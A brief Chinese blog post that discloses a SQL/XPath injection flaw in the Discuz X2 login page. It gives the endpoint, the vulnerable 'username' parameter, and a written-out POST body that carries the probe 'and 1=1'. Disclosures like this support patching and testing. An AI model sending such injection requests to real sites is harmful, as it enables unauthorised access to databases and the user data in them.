Discuz X2 SQL /Xpath最新注入漏洞
请求方式:POST
影响页面:
https://www.webshell.cc/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
参数:username
参数测试:and 1=1
攻击细节:
username=1+and+1=1&cookietime=2592000&password=1&quickforward=yes&handlekey=ls&fastloginfield
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/484.html